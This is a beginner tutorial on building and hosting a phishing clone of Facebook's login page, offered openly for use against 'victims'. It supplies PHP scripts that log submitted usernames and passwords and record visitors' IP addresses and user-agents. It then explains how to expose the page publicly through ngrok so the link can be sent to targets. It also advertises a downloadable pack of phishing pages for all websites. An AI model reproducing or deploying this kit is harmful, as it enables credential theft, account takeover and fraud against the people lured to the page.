Complete guide creating and hosting a phishing page

Table of Contents

phishing page – In this article, I’m going to teach you how to create a phishing page for beginners. Now you think so many phishing tools are available on the web, so why do we need to create a phishing site. All tools are creator convenience so you can only use that page. but if you learn from this tutorial you can make any website a phishing page.

How to create a phishing page?

  1. Any Device
  2. Chrome Browser
  1. Get username and password
  2. Get User-Agent information
  3. Get OTP

Download HTML Index page of Target

First, we need to choose the target website. After that just go to that website. I choose the Facebook website.

Complete guide creating and hosting a phishing page
Facebook page

Once you entered your target website, click right said mouse button to select the “view page source” option

Complete guide creating and hosting a phishing page
Select view page source option

Once you click the “view page source option“. it will open one new window and show all that website source

facebook page source code
Facebook page source

Now press Ctrl+A to copy the Facebook page source. After that past it to your notepad

Complete guide creating and hosting a phishing page
Save source code into our notepad

After getting the page source in your notepad. press Ctrl+F to open the find bar on your notepad. then type Action= in the find bar

Complete guide creating and hosting a phishing page
Find Action= command

Now Remove the /login/privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEwNzY3NTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D command and type login.php 

Complete guide creating and hosting a phishing page
Replace the action Url to login.php

After that save this facebook source file with the name login.html

how to create phishing site
Save edited facebook page source

Creating PHP file For Password Harvesting

Now we have to complete creating a Facebook phishing site but if we host this login.html file into our system it will not capture any data from the user so now we need to create a harvesting PHP script Therefore you follow the below steps.

First, you need to copy paste the below PHP code in your notepad.

				
					<?php
header (‘Location: facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
				
			

After that, you save this PHP file with the name login.php

victim information geathering
Save Harvesting PHP file

If we need to create other website phishing pages means one small correction is there in the login.php file header section. the current login.php file header section is facebook.com. if you create an Instagram phishing page means you change that header value facebook.com to instagram.com

				
					<?php
header (‘Location: instagram.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
				
			

Create a PHP file to get user-agent information

Now we completed creating a phishing page and creating a Password Harvesting script. After that, we need to create a user-agent information script so you follow the below steps.

Now we need to create another PHP file to capture victim “user-agent” information so you copy the below PHP code and past it to your notepad.

				
					<?php
if (!empty($_SERVER[‘HTTP_CLIENT_IP’]))
    {
      $ipaddress = $_SERVER[‘HTTP_CLIENT_IP’].”rn”;
    }
elseif (!empty($_SERVER[‘HTTP_X_FORWARDED_FOR’]))
    {
      $ipaddress = $_SERVER[‘HTTP_X_FORWARDED_FOR’].”rn”;
    }
else
    {
      $ipaddress = $_SERVER[‘REMOTE_ADDR’].”rn”;
    }
$useragent = ” User-Agent: “;
$browser = $_SERVER[‘HTTP_USER_AGENT’];
$file = ‘ip.txt’;
$victim = “IP: “;
$fp = fopen($file, ‘a’);
fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);
fclose($fp);
				
			

After that save this PHP file with the name ip.php

user agent information geathering script
Save User agent information script

Connect all files into one file

Now we have three files ip.php, login.html, and login.php. therefore connect all files into one file. so only we can host this file.

Copy the below PHP command into your notepad

				
					<?php
include ‘ip.php’;
header(‘Location: login.html’);
exit
?>
				
			

Now save these files with the name index.php

Complete guide creating and hosting a phishing page
All files into one file

How to Host a phishing page

so many ways are there to host our phishing page but now I’m teaching you two simple methods.

  1. Local server hosting
  2. 000webhost hosting

Local server hosting

First, you open the terminal inside the phishing page’s and type this below command.

				
					php -S localhost:4444
				
			
Hosting a phishing file
Host phishing page in local server

Now you will get a shareable link but this link only works on the same wifi network. if you need to share out of the network means to start the ngrok. so you minimize the current terminal and open a new one to start ngrok

hosting with ngrok
Ngrok link

Now share the ngrok link to your victim

Victim view

Once your victim clicks your link means that link will be shown in the below image.

Complete guide creating and hosting a phishing page
Facebook phishing page

If your victim types any data on your page.

victim view facebook phishing page
Username and password

That’s all data captured and show on your terminal.

get victim username and password
victim information

Now you can create any website as a phishing site with this method. if you need more techniques tell me the command section.

All website phishing page

All Website phishing page
You have to wait 120 seconds.

Download All Phishing Page

PASSWORD: www.errorsfind.com

4 thoughts on “Complete guide creating and hosting a phishing page

Leave a Reply

Your email address will not be published. Required fields are marked *